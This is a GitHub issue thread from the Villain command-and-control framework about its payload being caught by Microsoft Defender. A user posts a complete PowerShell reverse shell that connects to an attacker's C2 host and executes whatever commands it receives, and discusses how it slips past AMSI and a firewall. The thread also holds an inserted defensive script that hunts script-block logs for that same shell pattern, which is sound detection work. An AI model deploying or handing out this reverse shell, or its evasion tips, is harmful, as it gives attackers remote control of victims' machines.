t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).

Payload detected by Microsoft Defender #25

Closed cdrclbrs closed 1 year ago

cdrclbrs commented 1 year ago

Awesome work Panagiotis! The last Defender updates seem to block the payload (AMSI rules) even with encoding or obfuscation. While using a kind of hoaxshell script (nc -l -p 9001 on the C2C host), MDefender with AMSI cloud protection does not catch it, nor does the PaloAlto FW. Is this due to the persistence of the session?

```powershell
$LHOST = "C2C ip adress"
$LPORT = 9001
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT)
$NetworkStream = $TCPClient.GetStream()
$StreamReader = New-Object IO.StreamReader($NetworkStream)
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
$StreamWriter.AutoFlush = $true
$Buffer = New-Object System.Byte[] 1024
while ($TCPClient.Connected) {
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length)
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData - 1)
    }
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try {
            Invoke-Expression ($Code) 2>&1
        }
        catch {
            $_
        }
        $StreamWriter.Write("$Output`n")
        $Code = $null
    }
}
$TCPClient.Close()
$NetworkStream.Close()
$StreamReader.Close()
$StreamWriter.Close()
```
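The question above is about whether Defender's AMSI catches this shell; a complementary, host-side check is to look for the same API pattern in PowerShell script block logging. The script below is an added detection example, not code from this thread or from the Villain project. It reads Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log and flags blocks that combine several of the calls the posted shell uses (TCPClient, GetStream, DataAvailable, Invoke-Expression, StreamWriter). It assumes script block logging is enabled and the caller can read that log; the indicator list, the `$MinScore` threshold and the function name `Get-SuspiciousScriptBlocks` are choices made for this example.

```powershell
# Added defensive example (not from the issue thread or the Villain project).
# Hunts PowerShell script block logging events (Event ID 4104) for the combination
# of calls used by a raw TCP Invoke-Expression shell. Assumes "Turn on PowerShell
# Script Block Logging" is enabled and the log is readable by the caller.
param(
    [int]$Hours = 24,      # how far back to search (assumed default)
    [int]$MinScore = 3     # indicators that must co-occur in one block (assumed threshold)
)

# Regex fragments of the shell pattern. Requiring several to co-occur avoids flagging
# scripts that merely open a socket or merely call Invoke-Expression.
$Indicators = @(
    'Net\.Sockets\.TCPClient',
    '\.GetStream\(\)',
    'DataAvailable',
    'Invoke-Expression',
    'StreamWriter'
)

function Get-SuspiciousScriptBlocks {
    param([int]$Hours, [int]$MinScore)

    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    # Get-WinEvent throws when nothing matches; treat that as "no events".
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($evt in $events) {
        # For 4104, EventData is MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path,
        # so Properties[2] holds the script text; fall back to Message if the layout differs.
        $text = if ($evt.Properties.Count -ge 3) { $evt.Properties[2].Value } else { $evt.Message }
        if (-not $text) { continue }

        $hits = @($Indicators | Where-Object { $text -match $_ })
        if ($hits.Count -ge $MinScore) {
            $flat = ($text -replace '\s+', ' ')
            [pscustomobject]@{
                TimeCreated = $evt.TimeCreated
                RecordId    = $evt.RecordId
                Score       = $hits.Count
                Indicators  = ($hits -join ', ')
                Snippet     = $flat.Substring(0, [Math]::Min(120, $flat.Length))
            }
        }
    }
}

Get-SuspiciousScriptBlocks -Hours $Hours -MinScore $MinScore | Format-Table -AutoSize
```

Script block logging records each block as PowerShell compiles it, so a launcher that only string-obfuscates the outer command still leaves the decoded inner block in the log when it reaches Invoke-Expression; that is why matching on the decoded API names is worthwhile even when the on-disk or on-the-wire payload is encoded.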
cdrclbrs commented 1 year ago

I made a mistake; Constraint_mode fixes this.

peasead commented 1 year ago

Nice!

Maybe move this here? https://github.com/t3l3machus/Villain/issues/15

He said he was going to leave that one open indef to track Defender.